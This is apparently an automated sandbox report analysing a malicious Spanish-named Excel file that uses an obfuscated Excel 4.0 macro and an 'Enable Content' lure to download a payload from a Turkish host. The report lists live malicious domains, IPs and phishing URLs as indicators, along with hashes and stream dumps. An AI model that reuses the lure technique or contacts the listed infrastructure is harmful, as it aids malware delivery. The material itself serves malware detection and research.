Loading ...

Play interactive tourEdit tour

Analysis Report LIQUIDACION INTERBANCARIA 02_22_2021.xls

Overview

General Information

Sample Name:LIQUIDACION INTERBANCARIA 02_22_2021.xls
Analysis ID:356267
MD5:8cc0e4d5044939ef3d7a7d8825d8c9c9
SHA1:61ca1ae2ac0fa0fb0f075ee09f9ff83985b5b66b
SHA256:35cf92b551f09ba61770ce1c7c5dc73b3c3e291eb98948c87d430646370a103f
Tags:ESPgeoOutlookxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Document contains embedded VBA macros
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Unable to load, office file is protected or invalid

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2276 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

Compliance:

barindex
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Source: global trafficDNS query: name: www.seyranikenger.com.tr
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.162.146.6:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.162.146.6:443
Source: unknownDNS traffic detected: queries for: www.seyranikenger.com.tr
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Content . , " - f """'m' I @ !|| 14 A239 " ' " " " Macro error at ed: 15 A B C D E F [LIQ
Source: Document image extraction number: 0Screenshot OCR: Enable Content .. A239 " ; / jx A B C D E F G H I J K 1 2 3 ERROR DOCUMENTO DE APERTURA POR
Source: Document image extraction number: 1Screenshot OCR: Enable Content A239 fr A B C D E f G 11 I J K 1 2 3 ERROR DOCUMENTO DE APERTURA POR QUE: E
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xlsInitial sample: EXEC
Found obfuscated Excel 4.0 MacroShow sources
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xlsInitial sample: High usage of CHAR() function: 23
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xlsOLE indicator, VBA macros: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow title found: microsoft excel okcannot run 'c:\programdata\a.exe'. the program or one of its components is damaged or missing.
Source: classification engineClassification label: mal60.expl.evad.winXLS@1/4@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\6BEE0000Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE35C.tmpJump to behavior
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xlsStream path 'Workbook' entropy: 7.96834669995 (max. 8.0)

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionPath InterceptionMasquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting21Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
seyranikenger.com.tr
185.162.146.6
truefalse
    unknown
    www.seyranikenger.com.tr
    unknown
    unknownfalse
      unknown

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      185.162.146.6
      unknownTurkey
      60721BURSABILTRfalse

      General Information

      Joe Sandbox Version:31.0.0 Emerald
      Analysis ID:356267
      Start date:22.02.2021
      Start time:20:28:29
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 4m 32s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:LIQUIDACION INTERBANCARIA 02_22_2021.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:4
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • EGA enabled
      • HDC enabled
      • GSI enabled (VBA)
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal60.expl.evad.winXLS@1/4@1/1
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Changed system and user locale, location and keyboard layout to French - France
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe
      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/356267/sample/LIQUIDACION INTERBANCARIA 02_22_2021.xls

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      BURSABILTR57229937-122020-4-7676523.docGet hashmaliciousBrowse
      • 194.31.59.68
      https://gunsenkul.com/MARKET/Get hashmaliciousBrowse
      • 45.139.223.28
      http://www.934934.zionmedicalsolutions.com/#aHR0cHM6Ly9lbXl0dXJrLmNvbS9vZC9JSy9vZjEvYS5naWVzaW5nQGZyeXNsYW4ubmw=Get hashmaliciousBrowse
      • 45.139.223.28
      http://www.947947.mirramodaintima.com.br/#aHR0cHM6Ly9lbXl0dXJrLmNvbS9zZC9JSy9vZjEvRmlkZWwuVG9ycmVzQHNlYXJzaGMuY29tGet hashmaliciousBrowse
      • 45.139.223.28
      NpSM636bIh.exeGet hashmaliciousBrowse
      • 45.139.202.202
      Qc2mTPl5Ng.exeGet hashmaliciousBrowse
      • 45.139.202.202
      https://www.raddelmotalaka.com/wp-include/zimonedrive/Get hashmaliciousBrowse
      • 185.162.146.30
      243VSI 2020_09_04 BOA53680.docGet hashmaliciousBrowse
      • 185.126.176.84
      14501-2020_09_04-61313.docGet hashmaliciousBrowse
      • 185.126.176.84
      910101-2020_09_04-121264.docGet hashmaliciousBrowse
      • 185.126.176.84
      dat-2020_09_04-G223456.docGet hashmaliciousBrowse
      • 185.126.176.84
      list_2020_09_04_P145.docGet hashmaliciousBrowse
      • 185.126.176.84
      Doc 2020_09_04 QM1291.docGet hashmaliciousBrowse
      • 185.126.176.84
      list 2020_09_04 244847.docGet hashmaliciousBrowse
      • 185.126.176.84
      MES-2020_09_04-D926.docGet hashmaliciousBrowse
      • 185.126.176.84
      dat_MN857590.docGet hashmaliciousBrowse
      • 185.126.176.84
      Attachments 2020_09_04 NC2457.docGet hashmaliciousBrowse
      • 185.126.176.84
      dat 2020_09_03 2469395.docGet hashmaliciousBrowse
      • 185.126.176.84
      DAT-20200903-9952.docGet hashmaliciousBrowse
      • 185.126.176.84
      713S_2020_09_03_WFH561181.docGet hashmaliciousBrowse
      • 185.126.176.84

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Temp\7AEE0000
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):229058
      Entropy (8bit):7.982639414599616
      Encrypted:false
      SSDEEP:6144:dFcAyojHNQB2+Uvs6Tu0EA0le7mfFjnmQW/AVc9PT:dxhkpUv30SWmc2PT
      MD5:6C7E2AB214EF2B07805B5B6139F7DDBA
      SHA1:CF16AD747082845DC7ED15D52AE17F4C5218390D
      SHA-256:29FE2CA28C39E9D370F4DF19F55BF993F68AEC530C149CD4F030DDBD89B411C7
      SHA-512:264DCFCF4F2942123FEF40A4CDAC168DD50A3A5BD49AAC6EDA4CE96EF8B322BFF4817F3E4CA15DF22CFA604B70AFBCDAE8E82E89475C2075F99A49C412F8A394
      Malicious:false
      Reputation:low
      Preview: .U.n.0....?..."......C....I?.&..k..e.....1l.F{1dQ...;._o..6....+>c.x...m.~=.._Y.Yz-m... .^|.0..E.............'....VV!9..ojE.j-[..g./B....:......J>.\.n.....xV}.?W..&c.F.LF.....:.VF.....5.@j....<&C...r..!.G5.o.4.+....... .6..8!..`g"~..N(...9.......P...HGi....!..!..8I..a.[....q'U..^.-.4...............%....2!W66.....L...W.....;.....[.i&.1.,....K...=.r'..L...w..sO..I>..b.........R...T...D..#..+.}lz...8".b....K..t...R6..(..TU....,....h............PK..........!.._U1....c.......[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Feb 23 03:29:45 2021, atime=Tue Feb 23 03:29:45 2021, length=12288, window=hide
      Category:dropped
      Size (bytes):867
      Entropy (8bit):4.489637393354788
      Encrypted:false
      SSDEEP:12:85QDLgXg/XAlCPCHaX2B8GB/boGkfX+WnicvblObDtZ3YilMMEpxRljKmTdJP9TK:858/XTm6GFqYe8Dv3q7rNru/
      MD5:CEB838762BF6A5323F565EBB2ED25679
      SHA1:2821E171EF1BEBDD47CC4D467FB6A57223CDC006
      SHA-256:20EC08F1EE0F838B2BD041B53E9DECC3EFB6CCB3BB5F72AA85C27EB7EACDF758
      SHA-512:F271EF4DFE69EE8A3892ACBE7D7CAB2C165E9C92D058DFC780C2AD121378E8E3BD85DD7705FC53A9B814BF8E2EA9B51DAE8C71A7D0F064BDCB43C9245A4001B1
      Malicious:false
      Reputation:low
      Preview: L..................F...........7G....k.......k......0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....WR.#..Desktop.d......QK.XWR.#*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\226546\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......226546..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\LIQUIDACION INTERBANCARIA 02_22_2021.LNK
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Tue Feb 23 03:29:45 2021, atime=Tue Feb 23 03:29:45 2021, length=784896, window=hide
      Category:dropped
      Size (bytes):2288
      Entropy (8bit):4.555482484816661
      Encrypted:false
      SSDEEP:48:8f/XTFGqUzjND57Qh2f/XTFGqUzjND57Q/:8f/XJGqG/7Qh2f/XJGqG/7Q/
      MD5:7E60BDA8CA27C3CC5701244AC21EF4DA
      SHA1:C2982A7D443AE41108C86D7B698851B16C38964E
      SHA-256:3A7610A376EBF8AA07157C12F89243881CABFCAFCD84DE309927082EF6141D12
      SHA-512:BF9DB02C360C878E9667BE0AB697B94EB715D59FA6349C373F2932E4355348F66D323D373D8338DFF9B8946FEE38D925DF41287FD5CB3847C92E9ACE8E6D786F
      Malicious:false
      Reputation:low
      Preview: L..................F.... ....2u..{....k.......w..................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....WR.# .LIQUID~1.XLS..~.......Q.y.Q.y*...8.....................L.I.Q.U.I.D.A.C.I.O.N. .I.N.T.E.R.B.A.N.C.A.R.I.A. .0.2._.2.2._.2.0.2.1...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\226546\Users.user\Desktop\LIQUIDACION INTERBANCARIA 02_22_2021.xls.?.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.L.I.Q.U.I.D.A.C.I.O.N. .I.N.T.E.R.B.A.N.C.A.R.I.A. .0.2._.2.2._.2.0.2.1...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):161
      Entropy (8bit):4.645820606938903
      Encrypted:false
      SSDEEP:3:oyBVomMHvLJ0rmkT46lxaAvLJ0rmkT46lmMHvLJ0rmkT46lv:dj6UTtjaTTtxUTt1
      MD5:618DC56A1C2E874ECEFE016D75912A39
      SHA1:E59AAD8BC8D58CDC964EEA6E53F8984B28CFA4EB
      SHA-256:01F801B1C3886DD726A351A3D1E028F996751D6F45823B4DDD81571F9DD1E6A2
      SHA-512:FFB6D23E8E6E1FFBB9C08EC78B2A7865E787C8CAAC5FB351BD1DF31F3039CE1DA763CB4B04B48972B94A5A7809D90453DE0A4DEA987962F5AEEE48B99FC92841
      Malicious:false
      Reputation:low
      Preview: Desktop.LNK=0..[xls]..LIQUIDACION INTERBANCARIA 02_22_2021.LNK=0..LIQUIDACION INTERBANCARIA 02_22_2021.LNK=0..[xls]..LIQUIDACION INTERBANCARIA 02_22_2021.LNK=0..

      Static File Info

      General

      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Dexter MORGAN, Last Saved By: HP PC, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Dec 3 22:00:53 2020, Last Saved Time/Date: Mon Feb 22 09:51:33 2021, Security: 0
      Entropy (8bit):7.938164956946986
      TrID:
      • Microsoft Excel sheet (30009/1) 47.99%
      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
      File name:LIQUIDACION INTERBANCARIA 02_22_2021.xls
      File size:774656
      MD5:8cc0e4d5044939ef3d7a7d8825d8c9c9
      SHA1:61ca1ae2ac0fa0fb0f075ee09f9ff83985b5b66b
      SHA256:35cf92b551f09ba61770ce1c7c5dc73b3c3e291eb98948c87d430646370a103f
      SHA512:f73682a1b16ca4271e711a539a078e266e181ec7bc9927844d285b238e789fe1ca727acce8fc2f6997c0fed163f1777e442fc390529ed96ebdb533adfdea3716
      SSDEEP:12288:27xSO0ZMQQnQ3yUZLUXA2ZGoMxFrYETEwIhMA++KnoGnkp4zL0mJm8gz:27EkznQ3bZIXASFEQwIhMA++LGkp4wmY
      File Content Preview:........................>.......................................................b.......d.......f.......h.......j.......l......................................................................................................................................

      File Icon

      Icon Hash:e4eea286a4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "LIQUIDACION INTERBANCARIA 02_22_2021.xls"

      Indicators

      Has Summary Info:True
      Application Name:Microsoft Excel
      Encrypted Document:False
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:True
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:True

      Summary

      Code Page:1252
      Author:Dexter MORGAN
      Last Saved By:HP PC
      Create Time:2020-12-03 22:00:53
      Last Saved Time:2021-02-22 09:51:33
      Creating Application:Microsoft Excel
      Security:0

      Document Summary

      Document Code Page:1252
      Thumbnail Scaling Desired:False
      Company:
      Contains Dirty Links:False
      Shared Document:False
      Changed Hyperlinks:False
      Application Version:1048576

      Streams with VBA

      VBA File Name: Feuil1.cls, Stream Size: 977
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Feuil1
      VBA File Name:Feuil1.cls
      Stream Size:977
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1a aa 91 12 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

      VBA Code Keywords

      Keyword
      VB_Exposed
      Attribute
      VB_Name
      VB_Creatable
      VB_PredeclaredId
      VB_GlobalNameSpace
      VB_Base
      VB_Customizable
      False
      VB_TemplateDerived
      VBA Code
      Attribute VB_Name = "Feuil1"
      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True
      VBA File Name: ThisWorkbook.cls, Stream Size: 1142
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
      VBA File Name:ThisWorkbook.cls
      Stream Size:1142
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 01 00 01 f0 00 00 00 0c 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 13 03 00 00 a7 03 00 00 00 00 00 00 01 00 00 00 1a aa 97 8c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

      VBA Code Keywords

      Keyword
      False
      VB_Exposed
      Attribute
      VB_Name
      VB_Creatable
      "ThisWorkbook"
      VB_PredeclaredId
      VB_GlobalNameSpace
      VB_Base
      VB_Customizable
      VB_TemplateDerived
      VBA Code
      Attribute VB_Name = "ThisWorkbook"
      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True
      Sub a()
      
      
      End Sub

      Streams

      Stream Path: \x1CompObj, File Type: data, Stream Size: 108
      General
      Stream Path:\x1CompObj
      File Type:data
      Stream Size:108
      Entropy:4.18849998853
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
      General
      Stream Path:\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.67634243661
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
